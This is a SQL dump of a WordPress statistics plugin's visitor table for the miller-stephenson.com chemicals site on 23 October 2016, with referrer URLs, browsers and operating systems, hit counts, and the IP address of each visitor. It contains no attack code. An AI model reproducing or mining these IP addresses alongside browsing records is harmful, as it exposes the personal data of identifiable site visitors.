INSERT INTO `wp_statistics_visitor` VALUES (10327, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '36.0', '', '45.41.60.225', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10328, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '77.232.53.14', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10329, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.219.136.197', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10330, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.226.8.169', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10331, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '21.0', '', '209.128.119.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10332, '2016-10-23', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '65.151.2.6', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10333, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '125.209.235.170', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10334, '2016-10-23', 'https://www.google.co.uk/url?url=https://www.miller-stephenson.com/chemicals/release-agents/&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwiZweX06_DPAhXDC8AKHV2KB2QQFggfMAA&usg=AFQjCNEEEdrqzis_OcxM5npgX8tBA9v9hw', 'MSIE', 'Windows', '9.0', '', '82.71.192.161', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10335, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.54.130.88', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10336, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.141.218.192', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10337, '2016-10-23', 'https://www.miller-stephenson.com', 'MSIE', 'Unknown', 'or', '', '203.133.171.94', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10338, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.138', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10339, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '145.133.159.8', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10340, '2016-10-23', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.67.192.109', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10341, '2016-10-23', 'https://www.miller-stephenson.com/category/opteon-articles/', 'MSIE', 'Windows', '9.0', '', '182.118.21.225', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10342, '2016-10-23', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '73.49.9.245', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10343, '2016-10-23', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwilhbC49vDPAhXIyyYKHc2UAMEQFggxMAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fepoxy-resins%2Fepikure-curing-agents%2Fepikure-w-composites%2F&usg=AFQjCNHzMMm4nfWayelq-CkvH8QGcxHOCg&bvm=bv.136593572,d.eWE', 'MSIE', 'Windows', '11.0', '', '73.38.155.178', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10344, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.231.160.74', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10345, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.70', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10346, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.70', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10347, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.204', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10348, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '77.123.53.160', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10349, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.104.200.146', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10350, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.25.223.110', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10351, '2016-10-23', 'https://www.google.com.tr/', 'Chrome', 'Android', '34.0.1847.76', '', '178.240.13.153', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10352, '2016-10-23', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '38.103.84.36', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10353, '2016-10-23', 'https://r.search.yahoo.com/_ylt=A0LEVyi7uQxY_JsA015XNyoA;_ylu=X3oDMTEyMDNncGFtBGNvbG8DYmYxBHBvcwMxBHZ0aWQDQjE5MTBfMQRzZWMDc3I-/RV=2/RE=1477257787/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2f/RK=0/RS=FKdmjy1F473hp8arXwygxU9aJpc-', 'Firefox', 'Windows', '49.0', '', '83.96.47.81', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10354, '2016-10-23', '(null)', 'Firefox', 'Windows', '33.0', '', '162.243.5.155', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10355, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '78.134.206.167', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10356, '2016-10-23', '(null)', 'Firefox', 'Windows', '33.0', '', '159.203.4.15', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10357, '2016-10-23', '(null)', 'Firefox', 'Windows', '33.0', '', '159.203.42.143', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10358, '2016-10-23', 'https://r.search.yahoo.com/_ylt=AwrSbnUGugxYi.AAfIxXNyoA;_ylu=X3oDMTByc3RzMXFjBGNvbG8DZ3ExBHBvcwM0BHZ0aWQDBHNlYwNzcg--/RV=2/RE=1477257863/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2f/RK=0/RS=tO499v51eJPp_XwXtubTYMKYu0k-', 'Edge', 'Windows', '14.14393', '', '73.19.105.140', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10359, '2016-10-23', '(null)', 'Firefox', 'Windows', '33.0', '', '192.241.234.4', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10360, '2016-10-23', '(null)', 'Firefox', 'Windows', '33.0', '', '104.236.222.79', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10361, '2016-10-23', '(null)', 'Firefox', 'Windows', '33.0', '', '159.203.196.79', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10362, '2016-10-23', '(null)', 'Firefox', 'Windows', '33.0', '', '192.34.60.103', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10363, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.215.112.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10364, '2016-10-23', 'https://www.electroyou.it/forum/viewtopic.php?f=1&t=42874&start=60', 'MSIE', 'Windows', '11.0', '', '93.150.227.137', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10365, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '220.247.244.23', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10366, '2016-10-23', 'https://www.google.co.za/', 'Firefox', 'Linux', '49.0', '', '41.169.89.150', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10367, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.106.177.44', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10368, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.43', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10369, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.88', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10370, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '193.46.213.130', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10371, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '14.0.835.202', '', '104.188.249.49', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10372, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.176.7.182', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10373, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '47.0', '', '24.193.212.151', '000', 550, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10374, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.159.243.99', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10375, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.241.100.243', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10376, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.234.121.226', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10377, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.76', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10378, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.140.21.164', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10379, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.146.203.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10380, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '49.0.2623.87', '', '192.154.111.122', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10381, '2016-10-23', 'https://chelnytruck.ru/', 'MSIE', 'Windows', '6.0', '', '46.118.155.22', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10382, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.156', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10383, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.152', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10384, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.52.255.18', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10385, '2016-10-23', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '176.9.74.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10386, '2016-10-23', 'https://kazus.ru/forums/showthread.php?t=58915', 'Opera Next', 'Linux', '40.0.2308.90', '', '88.206.83.109', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10387, '2016-10-23', 'https://www.miller-stephenson.com', 'Android Browser', 'Android', '4.0', '', '46.229.173.131', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10388, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '104.199.20.27', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10389, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.12', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10390, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.101.247.106', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10391, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '182.65.198.33', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10392, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '192.99.147.201', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10393, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.27.104.155', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10394, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '26.0.1410.63', '', '185.7.213.12', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10395, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.70.51.48', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10396, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '123.125.67.166', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10397, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.201.117.65', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10398, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.143', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10399, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.183', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10400, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '36.83.139.95', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10401, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.65.130.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10402, '2016-10-23', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '108.39.137.101', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10403, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '222.112.158.107', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10404, '2016-10-23', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.67.122.223', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10405, '2016-10-23', 'https://xn--24-glceagatoq7c2a6ioc.xn--p1ai/', 'Unknown', 'Unknown', 'Unknown', '', '46.118.118.216', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10406, '2016-10-23', 'https://www.google.ca/', 'Chrome', 'Android', '30.0.1599.92', '', '216.211.36.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10407, '2016-10-23', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '108.60.213.105', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10408, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.125', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10409, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.22', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10410, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '86.34.7.214', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10411, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '123.125.67.165', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10412, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.186.183.110', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10413, '2016-10-23', 'https://www.miller-stephenson.com', 'VB', 'Unknown', 'Unknown', '', '115.119.113.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10414, '2016-10-23', 'https://www.google.ie/', 'Chrome', 'Windows', '53.0.2785.143', '', '10.162.0.101', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10415, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.156', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10416, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.149', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10417, '2016-10-23', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '151.250.243.205', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10418, '2016-10-23', 'https://www.miller-stephenson.com', 'Safari', 'Unknown', '602.1', '', '151.250.243.205', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10419, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.172.83.235', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10420, '2016-10-23', 'https://www.google.ae/', 'Chrome', 'Android', '44.0.2403.133', '', '2.51.16.218', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10421, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.129.204.188', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10422, '2016-10-23', 'https://www.miller-stephenson.com/chemicals/epoxy-resin-systems/epoxy-stripping-agent-ms-111/', 'Safari', 'iPhone', '7.0', '', '131.253.27.33', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10423, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.182', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10424, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.112', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10425, '2016-10-23', 'https://www.google.co.id/', 'Chrome', 'Windows', '53.0.2785.143', '', '180.243.0.149', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10426, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '144.76.16.162', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10427, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '87.117.134.222', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10428, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.19.176.87', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10429, '2016-10-23', 'https://www.miller-stephenson.com/product/ms-580582/', 'Chrome', 'Windows', '53.0.2785.143', '', '67.201.11.195', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10430, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '80.234.125.196', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10431, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.210', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10432, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.91', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10433, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.149.47.136', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10434, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.163.128.26', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10435, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '128.69.107.120', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10436, '2016-10-23', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '64.183.73.158', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10437, '2016-10-23', 'https://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1218.pXdF7KAk4QMaiArryCjGkjnV9lOi3UrKVfbp1JXNZdtg--bgvihBrtV2_fq33NNA.94049e05cc1d2ce0d9113ba246fbd612a15cd2f5&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YG-XUIUpxKrkaoPisARVvB8&data=UlNrNmk5WktYejR0eWJFYk1LdmtxbWg4V3VrcVZRaW5qSEV5NjF2QkhsZDhTWUNDSHQwZzhXQkktSlF5d0NvOXh6MWltUlVTSUtvbmFJNXNyUGF0RXRuNVRwNHhxTThuUkRvcWRlQlBRaEh3czYwNUlKcldFRHNSM0JSd3BmYTVqc2U2bTFRZmVGaXN6SEtqc3JDR1hn&b64e=2&sign=5fd23214b3f73e1960b43a7166f77050&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYpgPUyh7uQlXMawitHwUO72z1aW6Pi5FmURHGisDt2qJOuOsDBxFYTv7ecfe7A2b7WNZDExawBhGubGoqIV6rJJA5Sd5hlDUcvsfQrfOmlHLUVvjkGbiHoaKmQmioWqluSjI2j6iCmh&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCW4RgmAu5ryJNumNVFnVhtWx23OBg4MAkpd92OqiDDp-XYQXs-mIBl66mYC3Yz0s4y-wDoHCSNQH7arQNRnyFcTW23dQRo6Eko&l10n=ru&cts=1477245920346&mc=2.76995126234', 'MSIE', 'Windows', '8.0', '', '109.173.32.138', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10438, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.29.11.82', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10439, '2016-10-23', 'https://www.miller-stephenson.com/about_us.aspx', 'MSIE', 'Windows', '9.0', '', '182.118.20.225', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10440, '2016-10-23', 'https://www.miller-stephenson.com/about_us.aspx', 'MSIE', 'Windows', '9.0', '', '182.118.20.228', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10441, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '31.0.1650.63', '', '93.79.223.44', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10442, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.131', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10443, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.200.202.128', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10444, '2016-10-23', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '35.160.84.241', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10445, '2016-10-23', 'https://www.google.com/', 'Safari', 'iPhone', '9.0', '', '50.121.138.184', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10446, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '80.71.142.93', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10447, '2016-10-23', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '76.90.23.225', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10448, '2016-10-23', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '198.71.231.45', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10449, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '89.169.114.227', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10450, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.131', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10451, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.204', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10452, '2016-10-23', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '191.252.46.239', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10453, '2016-10-23', 'https://www.google.com/', 'Chrome', 'Windows', '49.0.2623.112', '', '76.0.217.173', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10454, '2016-10-23', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '136.243.73.210', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10455, '2016-10-23', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '10.10', '', '79.3.69.168', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10456, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '93.185.207.7', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10457, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '112.197.203.58', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10458, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '82.140.78.78', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10459, '2016-10-23', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '127.0.0.1', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10460, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.61.20.96', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10461, '2016-10-23', 'https://www.miller-stephenson.com/product/epon-828/', 'Firefox', 'Windows', '45.0', '', '134.223.230.157', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10462, '2016-10-23', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '9.0', '', '42.236.10.100', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10463, '2016-10-23', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '91.109.247.244', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10464, '2016-10-23', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '184.168.200.148', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10465, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.27.119.105', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10466, '2016-10-23', 'https://www.miller-stephenson.com', 'BoogleBot2', 'Unknown', 'Unknown', '', '54.147.137.131', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10467, '2016-10-23', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '130.64.25.58', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10468, '2016-10-23', 'https://biglistofwebsites.com/go/miller-stephenson.com', 'Chrome', 'Windows', '52.3.2743.134', '', '112.197.203.58', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10469, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.164.254.45', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10470, '2016-10-23', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.29.140.64', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10471, '2016-10-23', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '53.0.2785.143', '', '45.72.157.69', '000', 2, 0); 
